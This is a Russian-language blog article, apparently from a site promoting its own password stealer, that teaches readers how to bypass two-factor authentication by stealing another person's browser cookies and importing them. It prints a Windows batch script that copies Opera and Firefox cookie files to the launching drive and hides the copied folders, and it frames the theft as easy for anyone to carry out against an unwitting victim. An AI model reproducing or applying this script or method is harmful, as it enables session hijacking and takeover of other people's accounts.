Обход двухфакторной аутентификации с помощью cookies
Обход двухфакторной аутентификации с помощью cookies
Двухфакторная аутентификация – это один из видом многофакторной аутентификации, известна ещё как “двухэтапная верификация” и представляет собой технологию, обеспечивающую идентификацию пользователей с помощью комбинации двух различных компонентов. Как самый понятный пример, можно взять аутентификацию в Google или Steam. Если вы заходите с нового компьютера, то вам помимо логина и пароля нужно ввести шестизначный код подтверждения. Как правило он приходит через SMS или голосовой вызов.
Плюсы двухфакторной аутентификации:
- Защита одноразовым ключом с помощью подтверждения через смартфон;
- Смартфон всегда под рукой, тем самым отсутствует необходимость в дополнительных токенах.
Минусы двухфакторной аутентификации через мобильное устройство:
- Мобильный телефон должен ловить сеть, когда происходит аутентификация, иначе сообщение с паролем просто не дойдет;
- Возможность перехвата сообщения с кодом подтверждения;
- Сообщения приходят с задержкой, время уходит на проверку подлинности;
- Вы делитесь номером, а значит есть возможность, что будет приходить спам.
На сайте уже есть статья о стиллере паролей – читать, а также с приложениями для Android, для перехвата трафика, в том числе и cookies – click.
Обход двухфакторной аутентификации с помощью подмены cookies
Существует множество плагинов, позволяющих загрузить свои cookies, скачайте и установите один из них.
Для начала требуется перехватить или украсть cookies у человека, к которому вы хотите зайти не зная логина и пароля. Для этого вы можете воспользоваться одним из приложений или переделать наш портативный стиллер, чтобы он работал с Куки.
Код для кражи cookies с браузеров Opera & Mozilla:
@echo off
md %~d0Mozilla
md %~d0Opera
CD/D %APPDATA%OperaOpera
copy /y cookies.dat %~d0Opera
cd %AppData%MozillaFirefoxProfiles*.def-ault
copy /y cookies.sqlite %~d0Mozilla
ATTRIB -R -A -S -H
attrib +h %~d0Opera
attrib +h %~d0Mozilla
Модифицировать данный код под любой браузер не составит труда, главное найти нужные директории.
После того, как у вас появились нужные cookies, требуется очистить браузер от всех Куки, которые там есть и добавить те, которые вы перехватилиукрали.
Всё, можете проверять сервисы. Если человек был на сайте с двухэтапной аутентификацией, то вам не потребуется ни логина-пароля, ни кода подтверждения, так как вы сразу попадете на авторизованную страницу.
Данный обход двухэтапной аутентификации имеет ряд минусов:
- Не знаете ни логина, ни пароля;
- Нет возможности изменить пароль или получить резервные коды;
- Не работает с сервисами, требующими подтверждения каждый раз, вне зависимости от того, был ранее совершен вход с устройства или нет.
Обход двухфакторной аутентификации с помощью подмены cookies – это довольно простой и эффективный способ, которым может воспользоваться абсолютно каждый без особых усилий.
Если вам понравилась статья, подписывайтесь на обновление сайта, а также наш Telegram.
Telegram
Подписывайтесь на официальный Telegram канал сайта Make Info.
3
5